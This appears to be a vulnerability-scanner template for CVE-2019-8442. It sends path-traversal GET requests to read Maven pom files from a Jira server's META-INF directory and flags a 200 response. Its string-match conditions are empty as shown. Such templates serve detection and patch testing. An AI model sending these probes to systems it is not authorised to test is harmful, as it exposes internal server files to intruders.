id: CVE-2019-8442 info: name: Jira Webroot Path Traversal risk: High params: - root: '{{.BaseURL}}' variables: - endpoint: | s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties requests: - method: GET redirect: false url: >- {{.root}}/{{.endpoint}} headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 detections: - >- StatusCode() == 200 && StringSearch("body", "") && StringSearch('body', '') references: - https://www.cvebase.com/cve/2019/8442